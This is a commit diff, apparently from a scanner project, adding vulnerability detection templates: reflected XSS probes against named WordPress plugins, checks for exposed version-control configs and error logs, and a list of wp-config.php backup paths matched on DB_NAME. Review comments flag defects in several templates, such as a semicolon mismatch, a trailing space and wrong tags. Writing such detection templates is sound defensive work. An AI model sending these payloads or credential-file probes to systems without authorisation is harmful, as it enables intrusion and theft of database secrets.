Adding some templates

main
Muhammad Daffa 2021-07-14 07:03:05 +07:00
parent 40e95b0992
commit 5ea03c0605
21 changed files with 645 additions and 0 deletions

29
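--- a/CVE-2012-4242.yaml
+++ b/CVE-2012-4242.yaml
@@ -0,0 +1,29 @@
+id: CVE-2012-4242
+info:
+name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
+tags: cve,cve2012,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200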
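Review bot: The body matcher looks for the constant string `<script>alert(123)</script>`, which is not tied to this request, so any `text/html` 200 page that already contains that text (a write-up, a stored test string) is reported as vulnerable. wp-church-admin-xss.yaml in this same commit puts `{{randstr}}` in both the path and the matcher; doing the same here, with `alert('{{randstr}}')` in the payload and `- "<script>alert('{{randstr}}')</script>"` under `words`, makes a match show that this request's input was reflected. The same applies to the other XSS templates in this commit that use a fixed `alert(1)` / `alert(123)` marker.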

29
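--- a/CVE-2013-2287.yaml
+++ b/CVE-2013-2287.yaml
@@ -0,0 +1,29 @@
+id: CVE-2013-2287
+info:
+name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
+tags: cve,cve2013,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123);</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200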

29
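--- a/CVE-2013-3526.yaml
+++ b/CVE-2013-3526.yaml
@@ -0,0 +1,29 @@
+id: CVE-2013-3526
+info:
+name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
+tags: cve,cve2013,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(1)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200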

29
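--- a/CVE-2014-9094.yaml
+++ b/CVE-2014-9094.yaml
@@ -0,0 +1,29 @@
+id: CVE-2014-9094
+info:
+name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
+author: daffainfo
+severity: medium
+reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+tags: cve,2014,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(1)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200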
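Review bot: The `tags` line reads `cve,2014,wordpress,xss,wp-plugin`, while every other CVE template in this commit uses the `cveYYYY` form (`cve2012`, `cve2013`, `cve2017`, ...). A scan or report filtered on the `cve2014` tag would therefore skip this template. Change the line to `tags: cve,cve2014,wordpress,xss,wp-plugin`.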

35
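--- a/CVE-2017-5487.yaml
+++ b/CVE-2017-5487.yaml
@@ -0,0 +1,35 @@
+id: CVE-2017-5487
+info:
+name: WordPress Core < 4.7.1 - Username Enumeration
+author: Manas_Harsh,daffainfo,geeknik
+severity: info
+description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
+tags: cve,cve2017,wordpress
+reference: |
+- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
+- https://www.exploit-db.com/exploits/41497
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-json/wp/v2/users/"
+- "{{BaseURL}}/?rest_route=/wp/v2/users/"
+matchers-condition: and
+matchers:
+- type: word
+part: header
+words:
+- "application/json"
+- type: status
+status:
+- 200
+- type: word
+words:
+- '"id":'
+- '"name":'
+- '"avatar_urls":'
+condition: and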
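Review bot: The matchers only establish that the users route returns JSON containing `"id":`, `"name":` and `"avatar_urls":`; nothing checks the WordPress version, although the name and description scope the finding to 4.7 before 4.7.1. As far as I know, later releases can still list post authors on this route, so results will probably include patched sites labelled with this CVE. Either give the template a generic user-enumeration name or state the limit in the description, for example by appending `A match shows the users listing is reachable, not that core is older than 4.7.1.`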

31
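--- a/CVE-2019-14470.yaml
+++ b/CVE-2019-14470.yaml
@@ -0,0 +1,31 @@
+id: CVE-2019-14470
+info:
+name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: |
+- https://wpscan.com/vulnerability/9815
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
+tags: cve,cve2019,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<svg/onload=alert(1)>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200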

29
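--- a/CVE-2019-15889.yaml
+++ b/CVE-2019-15889.yaml
@@ -0,0 +1,29 @@
+id: CVE-2019-15889
+info:
+name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
+tags: cve,cve2019,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(1)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200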

31
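--- a/CVE-2020-29395.yaml
+++ b/CVE-2020-29395.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-29395
+info:
+name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: |
+- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
+- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
+tags: cve,cve2020,wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<svg/onload=alert(1)>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200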

57
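--- a/error-logs.yaml
+++ b/error-logs.yaml
@@ -0,0 +1,57 @@
+id: error-logs
+info:
+name: common error log files
+author: geeknik,daffainfo
+severity: low
+tags: logs,exposure
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/routes/error_log"
+- "{{BaseURL}}/config/error_log"
+- "{{BaseURL}}/error_log"
+- "{{BaseURL}}/errors_log"
+- "{{BaseURL}}/logs/error.log"
+- "{{BaseURL}}/logs/errors.log"
+- "{{BaseURL}}/log/error.log"
+- "{{BaseURL}}/log/errors.log"
+- "{{BaseURL}}/errors/errors.log"
+- "{{BaseURL}}/error/error.log"
+- "{{BaseURL}}/errors.log"
+- "{{BaseURL}}/error.log"
+- "{{BaseURL}}/error.txt"
+- "{{BaseURL}}/errors.txt"
+- "{{BaseURL}}/admin/logs/error.log"
+- "{{BaseURL}}/admin/logs/errors.log"
+- "{{BaseURL}}/admin/log/error.log"
+- "{{BaseURL}}/admin/error.log"
+- "{{BaseURL}}/admin/errors.log"
+- "{{BaseURL}}/{{Hostname}}/error.log"
+- "{{BaseURL}}/{{Hostname}}/errors.log"
+- "{{BaseURL}}/MyErrors.log"
+- "{{BaseURL}}/log.txt"
+- "{{BaseURL}}/logs.txt"
+- "{{BaseURL}}/log.log"
+- "{{BaseURL}}/application/logs/application.log"
+- "{{BaseURL}}/application/logs/default.log"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "Segmentation Fault"
+- "coredump"
+- "script headers"
+- "Broken pipe"
+- "Array"
+condition: or
+- type: word
+words:
+- text/plain
+part: header
+- type: status
+status:
+- 200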
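Review bot: In the first word matcher, `"Array"` under `condition: or` is enough on its own to satisfy the body check, so any `text/plain` 200 response on one of these 27 paths that contains that word is reported as an exposed error log. Dropping it, or replacing it with a log-specific phrase such as `"PHP Warning"` or `"PHP Fatal error"`, would reduce false positives on ordinary text files like `log.txt`. Adding `part: body` to that matcher would also state the intent explicitly, as the header matcher below it already does.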

27
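--- a/exposed-bitkeeper.yaml
+++ b/exposed-bitkeeper.yaml
@@ -0,0 +1,27 @@
+id: exposed-bitkeeper
+info:
+name: Exposed BitKeeper Directory
+author: daffainfo
+severity: low
+reference: https://www.bitkeeper.org/man/config-etc.html
+tags: config,exposure
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/BitKeeper/etc/config"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "BitKeeper configuration"
+- "logging"
+- "email"
+- "description"
+condition: and
+- type: status
+status:
+- 200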

30
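--- a/exposed-bzr.yaml
+++ b/exposed-bzr.yaml
@@ -0,0 +1,30 @@
+id: exposed-bzr
+info:
+name: Exposed BZR Directory
+author: daffainfo
+severity: low
+reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html
+tags: config,exposure
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/.bzr/branch/branch.conf"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "parent_location"
+- "push_location"
+condition: or
+- type: status
+status:
+- 200
+- type: word
+part: header
+words:
+- "text/plain"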

23
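--- a/exposed-darcs.yaml
+++ b/exposed-darcs.yaml
@@ -0,0 +1,23 @@
+id: exposed-darcs
+info:
+name: Exposed Darcs Config
+author: daffainfo
+severity: low
+reference: http://darcs.net/Using/Configuration#sources
+tags: config,exposure
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/_darcs/prefs/binaries"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "Binary file regexps"
+- type: status
+status:
+- 200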

24
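--- a/exposed-hg.yaml
+++ b/exposed-hg.yaml
@@ -0,0 +1,24 @@
+id: exposed-hg
+info:
+name: Exposed HG Directory
+author: daffainfo
+severity: low
+tags: config,exposure
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/.hg/hgrc"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "[paths]"
+- "default"
+condition: and
+- type: status
+status:
+- 200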


@ -0,0 +1,39 @@
id: wordpress-accessible-wpconfig
info:
name: WordPress accessible wp-config
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo
severity: high
tags: wordpress,backups
requests:
- method: GET
path:
- '{{BaseURL}}/wp-config.php'
- '{{BaseURL}}/.wp-config.php.swp'
- '{{BaseURL}}/wp-config-sample.php'
- '{{BaseURL}}/wp-config.inc'
- '{{BaseURL}}/wp-config.old'
- '{{BaseURL}}/wp-config.txt'
- '{{BaseURL}}/wp-config.php.txt'
- '{{BaseURL}}/wp-config.php.bak'
- '{{BaseURL}}/wp-config.php.old'
- '{{BaseURL}}/wp-config.php.dist'
- '{{BaseURL}}/wp-config.php.inc'
- '{{BaseURL}}/wp-config.php.swp'
- '{{BaseURL}}/wp-config.php.html'
- '{{BaseURL}}/wp-config-backup.txt'
- '{{BaseURL}}/wp-config.php.save'
- '{{BaseURL}}/wp-config.php~'
- '{{BaseURL}}/wp-config.php.orig'
- '{{BaseURL}}/wp-config.php.original'
- '{{BaseURL}}/_wpeprivate/config.json'
matchers-condition: and
matchers:
- type: word
words:
- DB_NAME
- WPENGINE_ACCOUNT
part: body
- type: status
status:
- 200
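Review bot: The path list includes `wp-config-sample.php`, and the body matcher fires on `DB_NAME` alone because the two words have no `condition` and are therefore OR-ed. As far as I know the stock sample file ships with every WordPress install and holds only placeholder values, so a host that serves it as text would be reported at `severity: high` with no credential exposed. Consider dropping that path or moving it to a separate low-severity template. `'{{BaseURL}}/.wp-config.php.swp'` and `'{{BaseURL}}/wp-config.php.swp'` are both listed; if the dotted form is there for editor swap files, a comment such as `# editor swap file left next to wp-config.php` would record that.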

29
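--- a/wp-ambience-xss.yaml
+++ b/wp-ambience-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-ambience-xss
+info:
+name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://www.exploit-db.com/exploits/38568
+tags: wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<body onload=alert(1)>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200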
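Review bot: The `tags` line labels this template `wp-plugin`, but the name says "WordPress Theme Ambience" and the request path is under `/wp-content/themes/ambience/`. Tag-based selection and reporting will therefore file a theme finding with plugins. `tags: wordpress,xss,wp-theme` matches what the template checks.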

29
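--- a/wp-church-admin-xss.yaml
+++ b/wp-church-admin-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-church-admin-xss
+info:
+name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://www.securityfocus.com/bid/54329/info
+tags: wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert('{{randstr}}')</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200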

29
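--- a/wp-finder-xss.yaml
+++ b/wp-finder-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-finder-xss
+info:
+name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://www.securityfocus.com/bid/55217/info
+tags: wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123);</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200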

29
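--- a/wp-knews-xss.yaml
+++ b/wp-knews-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-knews-xss
+info:
+name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://www.securityfocus.com/bid/54330/info
+tags: wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E '
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200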
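Review bot: The quoted `path` value ends with a space before the closing quote (`...%3C/script%3E '`), so the request target carries a trailing space. Depending on how the client serialises it, that either malforms the request line or changes the value the server sees, and the template may then never match on an affected host. Remove the space so the value ends `%3C/script%3E'`.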

29
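--- a/wp-phpfreechat-xss.yaml
+++ b/wp-phpfreechat-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-phpfreechat-xss
+info:
+name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://www.securityfocus.com/bid/54332/info
+tags: wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(123)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200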

29
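--- a/wp-securimage-xss.yaml
+++ b/wp-securimage-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-securimage-xss
+info:
+name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS)
+author: daffainfo
+severity: medium
+reference: https://www.securityfocus.com/bid/59816/info
+tags: wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1'
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<script>alert(1)</script>"
+part: body
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200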
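Review bot: The payload in `path` decodes to `<script>alert(1);</script>`, with a semicolon, but the body matcher looks for `<script>alert(1)</script>`. A faithful reflection therefore cannot satisfy the word matcher, and the template will report nothing on an affected host. Make the two agree, for example `- "<script>alert(1);</script>"` under `words`.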

29
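--- a/wp-socialfit-xss.yaml
+++ b/wp-socialfit-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-socialfit-xss
+info:
+name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting
+author: daffainfo
+severity: medium
+description: |
+SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+reference: |
+- https://www.exploit-db.com/exploits/37481
+tags: wordpress,xss,wp-plugin
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E'
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- '<script>alert(1)</script>'
+- type: word
+part: header
+words:
+- "text/html"
+- type: status
+status:
+- 200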